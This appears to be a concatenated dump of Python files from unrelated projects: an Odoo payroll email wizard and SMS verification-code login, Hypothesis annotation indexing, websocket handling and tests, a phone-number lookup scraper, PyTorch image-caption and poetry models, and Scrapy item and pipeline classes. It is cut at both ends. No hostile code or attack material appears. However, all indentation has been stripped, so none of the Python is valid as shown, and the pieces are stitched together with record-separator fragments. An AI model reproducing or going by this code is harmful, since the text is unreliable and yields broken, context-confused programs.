payrolls = self.env['odoo.wage.payslip'].search(domain)
if not payrolls:
self.env['odoo.wage.payslip'].sudo().create(payroll_data)
else:
payrolls.sudo().write(payroll_data)
action = self.env.ref('odoo_wage_manage.odoo_wage_payslip_action')
return action.read()[0]
class SendPayrollAccountingToPayslipEmailTransient(models.TransientModel):
_name = 'send.wage.payroll.to.email.transient'
_description = "通过EMAIL发送核算明细至员工"
wage_date = fields.Date(string=u'核算月份', required=True)
date_code = fields.Char(string='期间代码')
payroll_ids = fields.Many2many('wage.payroll.accounting', relation='payroll_accounting_email_wage_payroll_accounting_rel', string=u'核算明细')
all_payroll = fields.Boolean(string=u'所有核算明细?')
@api.onchange('wage_date')
def _alter_date_code(self):
"""
根据日期生成期间代码
:return:
"""
for res in self:
if res.wage_date:
wage_date = str(res.wage_date)
res.date_code = "{}/{}".format(wage_date[:4], wage_date[5:7])
def send_email_now(self):
"""
批量发送核算明细至员工email,注意不是立即发送,通过邮件:EMail队列管理器进行发送
:return:
"""
self.ensure_one()
template_id = self.env.ref('odoo_wage_manage.wage_payroll_accounting_email_template', raise_if_not_found=False)
if not template_id:
return False
wage_date = str(self.wage_date)
date_code = "{}/{}".format(wage_date[:4], wage_date[5:7])
payrolls = self.env['wage.payroll.accounting'].sudo().search([('date_code', '=', date_code)])
for payroll in payrolls:
if payroll.employee_id.work_email:
logging.info("email至%s" % payroll.name)
template_id.sudo().with_context(lang=self.env.context.get('lang')).send_mail(payroll.id, force_send=False)
payroll.email_state = True
```
#### File: sms_base/controllers/sms_controller.py
```python
import datetime
import json
import logging
import werkzeug
from werkzeug.exceptions import BadRequest
from odoo import SUPERUSER_ID, api, http, _
from odoo import registry as registry_get
from odoo.addons.auth_oauth.controllers.main import OAuthController as Controller
from odoo.addons.web.controllers.main import (login_and_redirect, ensure_db)
from odoo.exceptions import AccessDenied
from odoo.http import request
_logger = logging.getLogger(__name__)
class OAuthController(Controller):
@http.route('/web/login/sms', type='http', auth='public', website=True, sitemap=False)
def web_odoo_sms_login(self, **kw):
"""
短信登录入口,点击后返回到验证码界面
:param kw:
:return:
"""
if request.session.uid:
request.session.uid = False
if request.session.login:
request.session.login = False
data = {'code_maxlength': 6} # 验证码默认最大长度
return request.render('sms_base.sms_login_signup', data)
@http.route('/web/sms/send/code', type='http', auth="public", website=True, sitemap=False)
def web_sms_send_code(self, **kw):
"""
发送验证码
:param kw:
:return:
"""
values = request.params.copy()
user_phone = values.get('user_phone')
if not user_phone:
return json.dumps({'state': False, 'msg': "手机号码不能为空!"})
_logger.info("手机号码:{}正在尝试发送验证码".format(user_phone))
# 验证员工是否有此手机号
domain = [('user_phone', '=', user_phone)]
user = request.env['res.users'].sudo().search(domain, limit=1)
if not user:
return json.dumps({'state': False, 'msg': "抱歉,您的手机号未注册,请联系管理员完善信息!"})
# 获取服务商
partners = request.env['sms.partner'].sudo().get_partners_priority(user)
if not partners:
return json.dumps({"state": False, 'msg': "系统未找到可用的短信服务商,请联系管理员维护!"})
# 使用服务商的发送验证码函数
result = partners.sudo().send_message_code(user, user_phone, 'login')
if result.get('state'):
return json.dumps({"state": True, 'msg': "验证码已发送,请注意查收短信!"})
return json.dumps({"state": False, 'msg': result.get('msg')})
@http.route('/web/sms/user/login', type='http', auth="public", website=True, sitemap=False)
def web_sms_user_login(self, **kw):
"""
验证登录验证码
:param kw:
:return:
"""
values = request.params.copy()
user_phone = values.get('phone')
code = values.get('code')
if not user_phone or not code:
return json.dumps({'state': False, 'msg': "手机号码和验证码不正确!"})
# 读取员工
user_domain = [('user_phone', '=', user_phone)]
user = request.env['res.users'].sudo().search(user_domain, limit=1)
if not user:
return json.dumps({'state': False, 'msg': "抱歉,您的手机号未注册,请联系管理员完善信息!"})
# 检查验证码和登录手机有效性
domain = [('phone', '=', user_phone), ('code', '=', code), ('state', '=', 'normal'), ('company_id', '=', user.company_id.id)]
records = request.env['sms.verification.record'].sudo().search(domain)
if not records:
return json.dumps({'state': False, 'msg': "验证码不正确,请重新输入!"})
# 检查时效
for record in records:
if datetime.datetime.now() > record.end_time:
record.sudo().write({'state': 'invalid'})
return json.dumps({'state': False, 'msg': "验证码已失效!请重新获取!"})
records.sudo().write({'state': 'invalid'})
# 验证通过执行登录操作
return self.do_post_login(user_phone)
def do_post_login(self, user_phone):
"""
执行登录
:param user_phone:
:return:
"""
if request.session.uid:
request.session.uid = False
if request.session.login:
request.session.login = False
ensure_db()
dbname = request.session.db
if not http.db_filter([dbname]):
return BadRequest()
registry = registry_get(dbname)
with registry.cursor() as cr:
try:
env = api.Environment(cr, SUPERUSER_ID, {})
credentials = env['res.users'].sudo().auth_oauth_sms('sms', user_phone)
cr.commit()
url = '/web'
resp = login_and_redirect(*credentials, redirect_url=url)
if werkzeug.urls.url_parse(resp.location).path == '/web' and not request.env.user.has_group('base.group_user'):
resp.location = '/'
return json.dumps({'state': True, 'msg': "登录成功"})
except AttributeError:
return json.dumps({'state': False, 'msg': "未在数据库'%s'上安装auth_signup:oauth注册已取消" % (dbname)})
except AccessDenied:
_logger.info('>>>SMS-OAuth2: 访问被拒绝,在存在有效会话的情况下重定向到主页,而未设置Cookie')
url = "/web/login?oauth_error=3"
redirect = werkzeug.utils.redirect(url, 303)
redirect.autocorrect_location_header = False
return redirect
except Exception as e:
return json.dumps({'state': False, 'msg': "OAuth2: %s" % str(e)})
```
#### File: sms_base/models/verification_record.py
```python
import logging
from odoo import api, fields, models
import datetime
_logger = logging.getLogger(__name__)
class SmsVerificationRecord(models.Model):
_description = '验证码记录'
_name = 'sms.verification.record'
_rec_name = 'sid'
_order = 'id'
RECORDTYPE = [
('login', '用户登录/注册'),
('passwd', '<PASSWORD>'),
]
partner_id = fields.Many2one(comodel_name='sms.partner', string=u'服务商', ondelete='cascade', index=True)
template_id = fields.Many2one(comodel_name='sms.template', string=u'模板', ondelete='cascade', index=True)
user_id = fields.Many2one(comodel_name='res.users', string=u'用户', index=True)
phone = fields.Char(string='手机号码', index=True)
sid = fields.Char(string='唯一标识')
code = fields.Char(string='验证码')
send_time = fields.Datetime(string=u'发送时间', default=fields.Datetime.now)
end_time = fields.Datetime(string=u'截至时间')
timeout = fields.Integer(string='有效时长(分钟)', default=30)
state = fields.Selection(string=u'状态', selection=[('normal', '未验证'), ('invalid', '已验证'), ], default='normal')
ttype = fields.Selection(string="消息类型", selection=RECORDTYPE)
company_id = fields.Many2one(comodel_name="res.company", string="所属公司")
@api.model
def create(self, values):
values['end_time'] = datetime.datetime.now() + datetime.timedelta(minutes=values['timeout'])
return super(SmsVerificationRecord, self).create(values)
class SmsSendRecord(models.Model):
_name = 'sms.send.record'
_description = '发送记录'
_rec_name = 'create_date'
_order = 'id'
TEMPLATETYPE = [
('new_user', '新用户通知'),
('up_pwd', '<PASSWORD>'),
('notice', '消息通知'),
]
create_date = fields.Datetime(string="创建时间", default=fields.Datetime.now, index=True)
partner_id = fields.Many2one(comodel_name="sms.partner", string="服务商", index=True, ondelete='cascade')
signature_id = fields.Many2one(comodel_name="sms.signature", string="短信签名", ondelete='cascade', index=True)
template_id = fields.Many2one(comodel_name='sms.template', string=u'模板', ondelete='cascade', index=True)
code = fields.Char(string="模板代码", index=True)
user_id = fields.Many2one(comodel_name='res.users', string=u'系统用户', index=True)
phone = fields.Char(string="手机号码", index=True)
ttype = fields.Selection(string="用于", selection=TEMPLATETYPE, default='code')
company_id = fields.Many2one(comodel_name="res.company", string="所属公司")
``` |
{
"source": "13625025773/h",
"score": 3
} |
#### File: h/search/index.py
```python
import logging
import time
from collections import namedtuple
import sqlalchemy as sa
from elasticsearch import helpers as es_helpers
from sqlalchemy.orm import subqueryload
from h import models, presenters
from h.events import AnnotationTransformEvent
from h.util.query import column_windows
log = logging.getLogger(__name__)
ES_CHUNK_SIZE = 100
PG_WINDOW_SIZE = 2000
class Window(namedtuple("Window", ["start", "end"])):
pass
def index(es, annotation, request, target_index=None):
"""
Index an annotation into the search index.
A new annotation document will be created in the search index or,
if the index already contains an annotation document with the same ID as
the given annotation then it will be updated.
:param es: the Elasticsearch client object to use
:type es: h.search.Client
:param annotation: the annotation to index
:type annotation: h.models.Annotation
:param target_index: the index name, uses default index if not given
:type target_index: unicode
"""
presenter = presenters.AnnotationSearchIndexPresenter(annotation, request)
annotation_dict = presenter.asdict()
event = AnnotationTransformEvent(request, annotation, annotation_dict)
request.registry.notify(event)
if target_index is None:
target_index = es.index
es.conn.index(
index=target_index,
doc_type=es.mapping_type,
body=annotation_dict,
id=annotation_dict["id"],
)
def delete(es, annotation_id, target_index=None, refresh=False):
"""
Mark an annotation as deleted in the search index.
This will write a new body that only contains the ``deleted`` boolean field
with the value ``true``. It allows us to rely on Elasticsearch to complain
about dubious operations while re-indexing when we use `op_type=create`.
:param es: the Elasticsearch client object to use
:type es: h.search.Client
:param annotation_id: the annotation id whose corresponding document to
delete from the search index
:type annotation_id: str
:param target_index: the index name, uses default index if not given
:type target_index: unicode
:param refresh: Force this deletion to be immediately visible to search operations
:type refresh: bool
"""
if target_index is None:
target_index = es.index
es.conn.index(
index=target_index,
doc_type=es.mapping_type,
body={"deleted": True},
id=annotation_id,
refresh=refresh,
)
class BatchIndexer:
"""
A convenience class for reindexing all annotations from the database to
the search index.
"""
def __init__(self, session, es_client, request, target_index=None, op_type="index"):
self.session = session
self.es_client = es_client
self.request = request
self.op_type = op_type
# By default, index into the open index
if target_index is None:
self._target_index = self.es_client.index
else:
self._target_index = target_index
def index(
self, annotation_ids=None, windowsize=PG_WINDOW_SIZE, chunk_size=ES_CHUNK_SIZE
):
"""
Reindex annotations.
:param annotation_ids: a list of ids to reindex, reindexes all when `None`.
:type annotation_ids: collection
:param windowsize: the number of annotations to index in between progress log statements
:type windowsize: integer
:param chunk_size: the number of docs in one chunk sent to ES
:type chunk_size: integer
:returns: a set of errored ids
:rtype: set
"""
if annotation_ids is None:
annotations = _all_annotations(session=self.session, windowsize=windowsize)
else:
annotations = _filtered_annotations(
session=self.session, ids=annotation_ids
)
# Report indexing status as we go
annotations = _log_status(annotations, log_every=windowsize)
indexing = es_helpers.streaming_bulk(
self.es_client.conn,
annotations,
chunk_size=chunk_size,
raise_on_error=False,
expand_action_callback=self._prepare,
)
errored = set()
for ok, item in indexing:
if not ok:
status = item[self.op_type]
was_doc_exists_err = "document already exists" in status["error"]
if self.op_type == "create" and was_doc_exists_err:
continue
errored.add(status["_id"])
return errored
def _prepare(self, annotation):
action = {
self.op_type: {
"_index": self._target_index,
"_type": self.es_client.mapping_type,
"_id": annotation.id,
}
}
data = presenters.AnnotationSearchIndexPresenter(
annotation, self.request
).asdict()
event = AnnotationTransformEvent(self.request, annotation, data)
self.request.registry.notify(event)
return (action, data)
def _all_annotations(session, windowsize=2000):
# This is using a windowed query for loading all annotations in batches.
# It is the most performant way of loading a big set of records from
# the database while still supporting eagerloading of associated
# document data.
windows = column_windows(
session=session,
column=models.Annotation.updated, # implicit ASC
windowsize=windowsize,
where=_annotation_filter(),
)
query = _eager_loaded_annotations(session).filter(_annotation_filter())
for window in windows:
for a in query.filter(window):
yield a
def _filtered_annotations(session, ids):
annotations = (
_eager_loaded_annotations(session)
.execution_options(stream_results=True)
.filter(_annotation_filter())
.filter(models.Annotation.id.in_(ids))
)
for a in annotations:
yield a
def _annotation_filter():
"""Default filter for all search indexing operations."""
return sa.not_(models.Annotation.deleted)
def _eager_loaded_annotations(session):
return session.query(models.Annotation).options(
subqueryload(models.Annotation.document).subqueryload(
models.Document.document_uris
),
subqueryload(models.Annotation.document).subqueryload(models.Document.meta),
subqueryload(models.Annotation.moderation),
subqueryload(models.Annotation.thread).load_only("id"),
)
def _log_status(stream, log_every=1000):
i = 0
then = time.time()
for item in stream:
yield item
i += 1
if i % log_every == 0:
now = time.time()
delta = now - then
then = now
rate = log_every / delta
log.info("indexed {:d}k annotations, rate={:.0f}/s".format(i // 1000, rate))
```
#### File: h/streamer/websocket.py
```python
import copy
import json
import logging
import weakref
from collections import namedtuple
import jsonschema
from gevent.queue import Full
from ws4py.websocket import WebSocket as _WebSocket
from h import storage
from h.streamer.filter import FILTER_SCHEMA, SocketFilter
log = logging.getLogger(__name__)
# Mapping incoming message type to handler function. Handlers are added inline
# below.
MESSAGE_HANDLERS = {}
# An incoming message from a WebSocket client.
class Message(namedtuple("Message", ["socket", "payload"])):
def reply(self, payload, ok=True):
"""
Send a response to this message.
Sends a reply message back to the client, with the passed `payload`
and reporting status `ok`.
"""
reply_to = self.payload.get("id")
# Short-circuit if message is missing an ID or has a non-numeric ID.
if not isinstance(reply_to, (int, float)):
return
data = copy.deepcopy(payload)
data["ok"] = ok
data["reply_to"] = reply_to
self.socket.send_json(data)
class WebSocket(_WebSocket):
# All instances of WebSocket, allowing us to iterate over open websockets
instances = weakref.WeakSet()
# Instance attributes
client_id = None
filter = None
query = None
def __init__(self, sock, protocols=None, extensions=None, environ=None):
super(WebSocket, self).__init__(
sock,
protocols=protocols,
extensions=extensions,
environ=environ,
heartbeat_freq=30.0,
)
self.authenticated_userid = environ["h.ws.authenticated_userid"]
self.effective_principals = environ["h.ws.effective_principals"]
self.registry = environ["h.ws.registry"]
self._work_queue = environ["h.ws.streamer_work_queue"]
def __new__(cls, *args, **kwargs):
instance = super(WebSocket, cls).__new__(cls)
cls.instances.add(instance)
return instance
def received_message(self, msg):
try:
payload = json.loads(msg.data)
except ValueError:
self.close(reason="invalid message format")
return
try:
self._work_queue.put(Message(socket=self, payload=payload), timeout=0.1)
except Full:
log.warning(
"Streamer work queue full! Unable to queue message from "
"WebSocket client having waited 0.1s: giving up."
)
def closed(self, code, reason=None):
try:
self.instances.remove(self)
except KeyError:
pass
def send_json(self, payload):
if not self.terminated:
self.send(json.dumps(payload))
def handle_message(message, session=None):
"""
Handle an incoming message from a client websocket.
Receives a :py:class:`~h.streamer.websocket.Message` instance, which holds
references to the :py:class:`~h.streamer.websocket.WebSocket` instance
associated with the client connection, as well as the message payload.
It updates state on the :py:class:`~h.streamer.websocket.WebSocket`
instance in response to the message content.
It may also passed a database session which *must* be used for any
communication with the database.
"""
payload = message.payload
type_ = payload.get("type")
# FIXME: This code is here to tolerate old and deprecated message formats.
if type_ is None:
if "messageType" in payload and payload["messageType"] == "client_id":
type_ = "client_id"
if "filter" in payload:
type_ = "filter"
# N.B. MESSAGE_HANDLERS[None] handles both incorrect and missing message
# types.
handler = MESSAGE_HANDLERS.get(type_, MESSAGE_HANDLERS[None])
handler(message, session=session)
def handle_client_id_message(message, session=None):
"""A client telling us its client ID."""
if "value" not in message.payload:
message.reply(
{
"type": "error",
"error": {"type": "invalid_data", "description": '"value" is missing'},
},
ok=False,
)
return
message.socket.client_id = message.payload["value"]
MESSAGE_HANDLERS["client_id"] = handle_client_id_message # noqa: E305
def handle_filter_message(message, session=None):
"""A client updating its streamer filter."""
if "filter" not in message.payload:
message.reply(
{
"type": "error",
"error": {"type": "invalid_data", "description": '"filter" is missing'},
},
ok=False,
)
return
filter_ = message.payload["filter"]
try:
jsonschema.validate(filter_, FILTER_SCHEMA)
except jsonschema.ValidationError:
message.reply(
{
"type": "error",
"error": {
"type": "invalid_data",
"description": "failed to parse filter",
},
},
ok=False,
)
return
if session is not None:
# Add backend expands for clauses
_expand_clauses(session, filter_)
SocketFilter.set_filter(message.socket, filter_)
MESSAGE_HANDLERS["filter"] = handle_filter_message # noqa: E305
def handle_ping_message(message, session=None):
"""A client requesting a pong."""
message.reply({"type": "pong"})
MESSAGE_HANDLERS["ping"] = handle_ping_message # noqa: E305
def handle_whoami_message(message, session=None):
"""A client requesting information on its auth state."""
message.reply({"type": "whoyouare", "userid": message.socket.authenticated_userid})
MESSAGE_HANDLERS["whoami"] = handle_whoami_message # noqa: E305
def handle_unknown_message(message, session=None):
"""Message type missing or not recognised."""
type_ = json.dumps(message.payload.get("type"))
message.reply(
{
"type": "error",
"error": {
"type": "invalid_type",
"description": "invalid message type: " "{:s}".format(type_),
},
},
ok=False,
)
MESSAGE_HANDLERS[None] = handle_unknown_message # noqa: E305
def _expand_clauses(session, filter_):
for clause in filter_["clauses"]:
if "field" in clause and clause["field"] == "/uri":
_expand_uris(session, clause)
def _expand_uris(session, clause):
uris = clause["value"]
expanded = set()
if not isinstance(uris, list):
uris = [uris]
for item in uris:
expanded.update(storage.expand_uri(session, item))
clause["value"] = list(expanded)
```
#### File: h/tasks/indexer_test.py
```python
import datetime
from unittest import mock
import pytest
from h_matchers import Any
from h.tasks import indexer
class FakeSettingsService:
def __init__(self):
self._data = {}
def get(self, key):
return self._data.get(key)
def put(self, key, value):
self._data[key] = value
class TestAddAnnotation:
def test_it_fetches_the_annotation(self, storage, annotation, celery):
id_ = "test-annotation-id"
storage.fetch_annotation.return_value = annotation
indexer.add_annotation(id_)
storage.fetch_annotation.assert_called_once_with(celery.request.db, id_)
def test_it_calls_index_with_annotation(self, storage, annotation, index, celery):
id_ = "test-annotation-id"
storage.fetch_annotation.return_value = annotation
indexer.add_annotation(id_)
index.assert_any_call(celery.request.es, annotation, celery.request)
def test_it_skips_indexing_when_annotation_cannot_be_loaded(
self, storage, index, celery
):
storage.fetch_annotation.return_value = None
indexer.add_annotation("test-annotation-id")
assert index.called is False
def test_during_reindex_adds_to_current_index(
self, storage, annotation, index, celery, settings_service
):
settings_service.put("reindex.new_index", "hypothesis-xyz123")
storage.fetch_annotation.return_value = annotation
indexer.add_annotation("test-annotation-id")
index.assert_any_call(
celery.request.es,
annotation,
celery.request,
target_index="hypothesis-xyz123",
)
def test_during_reindex_adds_to_new_index(
self, storage, annotation, index, celery, settings_service
):
settings_service.put("reindex.new_index", "hypothesis-xyz123")
storage.fetch_annotation.return_value = annotation
indexer.add_annotation("test-annotation-id")
index.assert_any_call(
celery.request.es,
annotation,
celery.request,
target_index="hypothesis-xyz123",
)
def test_it_indexes_thread_root(self, storage, reply, delay):
storage.fetch_annotation.return_value = reply
indexer.add_annotation("test-annotation-id")
delay.assert_called_once_with("root-id")
@pytest.fixture
def annotation(self):
return mock.Mock(spec_set=["is_reply"], is_reply=False)
@pytest.fixture
def reply(self):
return mock.Mock(
spec_set=["is_reply", "thread_root_id"],
is_reply=True,
thread_root_id="root-id",
)
@pytest.fixture
def delay(self, patch):
return patch("h.tasks.indexer.add_annotation.delay")
class TestDeleteAnnotation:
def test_it_deletes_from_index(self, delete, celery):
id_ = "test-annotation-id"
indexer.delete_annotation(id_)
delete.assert_any_call(celery.request.es, id_)
def test_during_reindex_deletes_from_current_index(
self, delete, celery, settings_service
):
settings_service.put("reindex.new_index", "hypothesis-xyz123")
indexer.delete_annotation("test-annotation-id")
delete.assert_any_call(
celery.request.es, "test-annotation-id", target_index="hypothesis-xyz123"
)
def test_during_reindex_deletes_from_new_index(
self, delete, celery, settings_service
):
settings_service.put("reindex.new_index", "hypothesis-xyz123")
indexer.delete_annotation("test-annotation-id")
delete.assert_any_call(
celery.request.es, "test-annotation-id", target_index="hypothesis-xyz123"
)
class TestReindexUserAnnotations:
def test_it_creates_batch_indexer(self, BatchIndexer, annotation_ids, celery):
userid = list(annotation_ids.keys())[0]
indexer.reindex_user_annotations(userid)
BatchIndexer.assert_any_call(
celery.request.db, celery.request.es, celery.request
)
def test_it_reindexes_users_annotations(self, BatchIndexer, annotation_ids):
userid = list(annotation_ids.keys())[0]
indexer.reindex_user_annotations(userid)
args, _ = BatchIndexer.return_value.index.call_args
actual = args[0]
expected = annotation_ids[userid]
assert sorted(expected) == sorted(actual)
@pytest.fixture
def annotation_ids(self, factories):
userid1 = "acct:<EMAIL>"
userid2 = "acct:<EMAIL>"
return {
userid1: [
a.id for a in factories.Annotation.create_batch(3, userid=userid1)
],
userid2: [
a.id for a in factories.Annotation.create_batch(2, userid=userid2)
],
}
class TestReindexAnnotationsInDateRange:
def test_it(self, BatchIndexer, celery, matching_annotations_ids):
indexer.reindex_annotations_in_date_range(
datetime.datetime.utcnow() - datetime.timedelta(days=7),
datetime.datetime.utcnow(),
)
BatchIndexer.assert_called_once_with(
celery.request.db, celery.request.es, celery.request,
)
BatchIndexer.return_value.index.assert_called_once_with(Any())
indexed_annotations = list(BatchIndexer.return_value.index.call_args[0][0])
assert sorted(indexed_annotations) == sorted(matching_annotations_ids)
@pytest.fixture(autouse=True)
def matching_annotations_ids(self, factories):
"""Annotations that're within the timeframe that we're reindexing."""
return [
annotation.id
for annotation in factories.Annotation.create_batch(
3, updated=datetime.datetime.utcnow() - datetime.timedelta(days=3)
)
]
@pytest.fixture(autouse=True)
def not_matching_annotations(self, factories):
"""Annotations that're outside the timeframe that we're reindexing."""
before_annotations = factories.Annotation.build_batch(
3, updated=datetime.datetime.utcnow() - datetime.timedelta(days=14)
)
after_annotations = factories.Annotation.build_batch(
3, updated=datetime.datetime.utcnow() + datetime.timedelta(days=14)
)
return before_annotations + after_annotations
pytestmark = pytest.mark.usefixtures("settings_service")
@pytest.fixture(autouse=True)
def BatchIndexer(patch):
return patch("h.tasks.indexer.BatchIndexer")
@pytest.fixture(autouse=True)
def celery(patch, pyramid_request):
cel = patch("h.tasks.indexer.celery")
cel.request = pyramid_request
return cel
@pytest.fixture(autouse=True)
def delete(patch):
return patch("h.tasks.indexer.delete")
@pytest.fixture(autouse=True)
def index(patch):
return patch("h.tasks.indexer.index")
@pytest.fixture
def pyramid_request(pyramid_request):
pyramid_request.es = mock.Mock()
return pyramid_request
@pytest.fixture
def settings_service(pyramid_config):
service = FakeSettingsService()
pyramid_config.register_service(service, name="settings")
return service
@pytest.fixture(autouse=True)
def storage(patch):
return patch("h.tasks.indexer.storage")
``` |
{
"source": "13636472690/Robot_Cherry",
"score": 3
} |
#### File: code/modules/phone.py
```python
from bs4 import BeautifulSoup
import requests
def check_phone(content): # 检查是否有电话号码
for i in range(0, len(content)):
if (content[i:i + 11].isdigit()) and (content[i] == '1'): # TODO:解决不是合法手机号码也会被识别的bug 2017_07_24
return content[i:i + 11]
def ask_phone(p): # 这个函数写的不好,不优美 TODO:重构此函数 2017_07_20
url = 'http://www.ip138.com:8080/search.asp?mobile=%s&action=mobile' % p
r = requests.get(url)
r.encoding = 'GBK'
soup = BeautifulSoup(r.text, "html.parser")
i = 0
list = {}
for string in soup.stripped_strings:
t = repr(string)
if i == 8: list[0] = t
if i == 13: list[1] = t
if i == 15: list[2] = t
if i == 17: list[3] = t
if i == 19: list[4] = t
i = i + 1
str = '手机号:' + list[0] + '\n' + '归属地:' + list[1] + '\n' + '卡类型:' + list[2] + '\n' + '区号:' + list[3] + '\n' + '邮编:' + \
list[4]
str = str.replace('\\xa0', ' ') # 去除特殊符号
str = str.replace("'", '') # 去除单引号
return str
``` |
{
"source": "1364354238/PYTORCH_LEARNING",
"score": 2
} |
#### File: PYTORCH_LEARNING/chapter10-图像描述(Image Caption)/model.py
```python
import torch as t
from torch import nn
from torch.nn.utils.rnn import pack_padded_sequence
import torchvision as tv
from torchvision import transforms
from utils.beam_search import CaptionGenerator
import time
from itertools import chain
class CaptionModel(nn.Module):
def __init__(self,opt,word2ix,ix2word):
super(CaptionModel, self).__init__()
self.ix2word = ix2word
self.word2ix = word2ix
self.opt = opt
self.fc = nn.Linear(2048,opt.rnn_hidden)
self.rnn = nn.LSTM(opt.embedding_dim,opt.rnn_hidden,num_layers=opt.num_layers)
self.classifier = nn.Linear(opt.rnn_hidden,len(word2ix))
self.embedding = nn.Embedding(len(word2ix),opt.embedding_dim)
if opt.share_embedding_weights:
# rnn_hidden=embedding_dim的时候才可以
self.embedding.weight
def forward(self,img_feats,captions,lengths):
embeddings = self.embedding(captions)
# img_feats是2048维的向量,通过全连接层转为256维的向量,和词向量一样
img_feats = self.fc(img_feats).unsqueeze(0)
# 将img_feats看成第一个词的词向量
embeddings = t.cat([img_feats,embeddings],0)
# PackedSequence
packed_embeddings = pack_padded_sequence(embeddings,lengths)
outputs,state = self.rnn(packed_embeddings)
# lstm的输出作为特征用来分类预测下一个词的序号
# 因为输入是PackedSequence,所以输出的output也是PackedSequence
# PackedSequence第一个元素是Variable,第二个元素是batch_sizes,
# 即batch中每个样本的长度
pred = self.classifier(outputs[0])
return pred,state
def generate(self, img, eos_token='</EOS>',
beam_size=3,
max_caption_length=30,
length_normalization_factor=0.0):
'''
根据图片生成描述,主要是使用beam search算法以得到更好的描述
'''
cap_gen = CaptionGenerator(embedder=self.embedding,
rnn=self.rnn,
classifier=self.classifier,
eos_id=self.word2ix[eos_token],
beam_size=beam_size,
max_caption_length=max_caption_length,
length_normalization_factor=length_normalization_factor)
if next(self.parameters()).is_cuda:
img = img.cuda()
img = t.autograd.Variable(img.unsqueeze(0), volatile=True)
img = self.fc(img).unsqueeze(0)
sentences, score = cap_gen.beam_search(img)
sentences = [' '.join([self.ix2word[idx] for idx in sent])
for sent in sentences]
return sentences
def states(self):
opt_state_dict = {attr:getattr(self.opt,attr)
for attr in dir(self.opt)
if not attr.startswith('__') }
return {
'state_dict':self.state_dict(),
'opt':opt_state_dict
}
def save(self,path=None,**kwargs):
if path is None:
path = '{prefix}_{time}'.format(prefix = self.opt.prefix,
time=time.strftime('%m%d_%H%M'))
states = self.states()
states.update(kwargs)
t.save(states, path)
return path
def load(self,path,load_opt=False):
data = t.load(path,map_location = lambda s,l :s)
state_dict = data['state_dict']
self.load_state_dict(state_dict)
if load_opt:
for k,v in data['opt'].items():
setattr(self.opt,k,v)
return self
def get_optimizer(self,lr):
return t.optim.Adam(self.parameters(),lr=lr)
```
#### File: PYTORCH_LEARNING/chapter9-神经网络写诗(CharRNN)/model.py
```python
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
class PoetryModel(nn.Module):
def __init__(self, vocab_size, embedding_dim, hidden_dim):
super(PoetryModel, self).__init__()
self.hidden_dim = hidden_dim
self.embeddings = nn.Embedding(vocab_size, embedding_dim)
self.lstm = nn.LSTM(embedding_dim, self.hidden_dim,num_layers=2)
self.linear1 = nn.Linear(self.hidden_dim, vocab_size)
def forward(self, input,hidden=None):
seq_len,batch_size = input.size()
if hidden is None:
# h_0 = 0.01*torch.Tensor(2, batch_size, self.hidden_dim).normal_().cuda()
# c_0 = 0.01*torch.Tensor(2, batch_size, self.hidden_dim).normal_().cuda()
h_0 = input.data.new(2, batch_size, self.hidden_dim).fill_(0).float()
c_0 = input.data.new(2, batch_size, self.hidden_dim).fill_(0).float()
h_0,c_0 = Variable(h_0),Variable(c_0)
else:
h_0,c_0 = hidden
# size: (seq_len,batch_size,embeding_dim)
embeds = self.embeddings(input)
# output size: (seq_len,batch_size,hidden_dim)
output, hidden = self.lstm(embeds, (h_0,c_0))
# size: (seq_len*batch_size,vocab_size)
output = self.linear1(output.view(seq_len*batch_size, -1))
return output,hidden
``` |
{
"source": "1365102044/lwscrapy",
"score": 2
} |
#### File: lwscrapy/lwscrapy/items.py
```python
import scrapy
from scrapy.loader import ItemLoader
from scrapy.loader.processors import TakeFirst, MapCompose
from w3lib.html import remove_tags
class LwscrapyItem(scrapy.Item):
# define the fields for your item here like:
pass
class GuaziItem(scrapy.Item):
name = scrapy.Field()
price = scrapy.Field()
time_s = scrapy.Field()
distance = scrapy.Field()
# 移除特定字符
def remove_ivaliedchar(str):
return str.replace('\u200b', '')
# 不做整体出来(既是不再取列表中的第一个非空值了)
def return_value(value):
return value
# 字符拼接
def add_baseurl(value):
return 'http://yao.xywy.com'+value
def to_list(value):
list = []
list.append(value)
return list
# 从图片url中切出特殊标识当做图片名字
def get_image_name(value):
return value.split('/')[-2]
# 定义一个默认输出的
class ArticalItemLoader(ItemLoader):
# 实现之前的extract_first()方法
# 这里只是重载这个属性,设置为只选取第一个值
default_output_processor = TakeFirst()
class MedicaldataItem(scrapy.Item):
# 药名
name = scrapy.Field()
# 生成企业
company = scrapy.Field()
# 功能
function = scrapy.Field(
input_processor = MapCompose(remove_tags, remove_ivaliedchar)
)
# 详情URL
deatil_url = scrapy.Field(
input_processor = MapCompose(add_baseurl)
)
# 审批编号
approval_num = scrapy.Field()
# 相关疾病
related_disease = scrapy.Field()
# 图片url
image_url = scrapy.Field(
# 维持该字段是数组形式(图片下载管道中间件需要)
input_processor = MapCompose(to_list,),
# 数据输出格式,使用不做特殊处理(屏蔽掉:取第一个非空数据/TakeFirst())
output_processor = MapCompose(return_value)
)
# 图片名
image_name = scrapy.Field(
input_processor = MapCompose(get_image_name)
)
# 天猫 数据
class TianMaoDataItemLoader(ItemLoader):
default_output_processor = TakeFirst()
class TianMaoDataItem(scrapy.Item):
title = scrapy.Field()
sales = scrapy.Field()
price = scrapy.Field()
deatilurl = scrapy.Field()
shopname = scrapy.Field()
class JingDongDataItemLoader(ItemLoader):
default_output_processor = TakeFirst()
class JingDongDataItem(scrapy.Item):
title = scrapy.Field()
price = scrapy.Field()
sku_id = scrapy.Field()
deatilurl = scrapy.Field()
commentsnum = scrapy.Field()
class JdCommentsItem(scrapy.Item):
sku_id = scrapy.Field()
content = scrapy.Field()
creationTime = scrapy.Field()
productColor = scrapy.Field()
productSize = scrapy.Field()
```
#### File: lwscrapy/lwscrapy/pipelines.py
```python
import pymysql
from twisted.enterprise import adbapi
from pymysql import cursors
from lwscrapy.items import MedicaldataItem, JdCommentsItem, JingDongDataItem
from scrapy.pipelines.images import ImagesPipeline
from scrapy import Request
class lwBasePipelines(object):
def __init__(self):
dbparams = {
'host': '127.0.0.1',
'port': 3306,
'user': 'root',
'password': '<PASSWORD>',
'database': 'lwqdata',
'charset': 'utf8',
'cursorclass': cursors.DictCursor
}
self.dbpool = adbapi.ConnectionPool('pymysql', **dbparams)
class lwJDPipelines(object):
def __init__(self):
dbparams = {
'host': '127.0.0.1',
'port': 3306,
'user': 'root',
'password': '<PASSWORD>',
'database': 'lwqdata',
'charset': 'utf8',
'cursorclass': cursors.DictCursor
}
